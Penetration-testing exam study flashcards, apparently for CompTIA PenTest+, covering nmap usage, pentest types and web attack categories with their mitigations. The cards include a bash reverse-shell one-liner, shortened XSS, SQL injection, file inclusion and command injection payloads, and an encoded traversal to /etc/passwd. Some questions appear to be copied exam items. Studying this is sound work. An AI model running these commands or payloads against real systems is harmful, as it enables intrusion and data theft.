Need2Know

Question 1

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Answer 1

opens a remote shell to 192.168.0.1:80

Question 2

SIMULATION -
You are a penetration tester running port scans on a server.

INSTRUCTIONS -
Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer 2

1. nmap -sV -O –top-ports 100 192.168.2.2

So you can see in the output it says “OS and Service detection performed” ( aka -sV and -O)
by default nmap scans the top 1000 ports so they had to specifiy –top-ports 100, it shows 4 ports and at the top of the output says 96 closed ports.

2. Null session attack & weak smb file permissions.

Question 3

The art of packet crafting can be divided into four phases

Answer 3

packet….

1. assembly
2. editing
3. play
4. decoding

Question 4

Goal-based Pentest

Answer 4

attempt to achieve specific goals

Question 5

Objective Based Pentest

Answer 5

uses all methods - accurately simulates a real attack

Question 6

Compliance-based pentest

Answer 6

objectives are clearly defined.

Question 7

Red Team

Answer 7

pentest conducted by internal pentesters during exercise to ensure defenders (Blue Team) can do their jobs

Question 8

https://www.examtopics.com/exams/comptia/pt0-001/view/4/

1. Reflected XSS ————– alert(1)
2. Sql Injection Stacked —-.item=widget….%20’00:00:20’; –
3. DOM XSS ——————…%3dalert (1) % 3e
4. Local File Inclusion —- logfile=%2fetc%2fpasswd%00
5. Command Injection – site=www.exa’ping%20-……
6. SQLi union —————item=widget%20union…
7. SQLi error —————–item=widget+convert…
8. Remote File Inclusion -logfile=http:%2f%2fwww.malicious…
9. Command Injection — lookup=$(whoami)
10. URL redirect————-redir=http:…..

Answer 8

1. • Input sanitization (<> …)
2. • Parameterized Queries
3. • Input Sanitization (<> …)
4. • sandbox req
5. • sandbox req
6. • paramtrized queries
7. • paramtrized queries
8. • sandbox
9. • input saniti $
10. • prevent external calls

Question 9

NIST SP 800 Methodology

Answer 9

Planning, Discovery, Attack, Reporting (PDAR)

Question 10

Given the output from the console above, which of the following explains how to correct the errors in the script? (Select
TWO)
A. Change fi\’ to \‘Endlf
B. Remove the \‘let\’ in front of \‘dest=5+5\’.
C. Change the \’=” to \‘-eq\’.
D. Change -Source* and \‘dest\’ to “$source” and “$dest”
E. Change \‘else\’ to \‘elif.

Answer 10

B,D

Question 11

URL Encoding

Answer 11

. == %2E
/ == %2F
\ == %5C

eg:
http://www.companysite.com/about.php?i=%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

Question 12

Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.

Answer 12

1 = #1/usr/bin/python
2 = ports = [21,22]
3 = for port in ports:
4 = port_scan(sys.argv[1], ports)

Question 13

password complexity

Answer 13

Zverlory
zv3rl0ry
Zverl0ry
Zv3r!0ry

Question 14

The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.

Answer 14

nist
nsrt
imdA
strat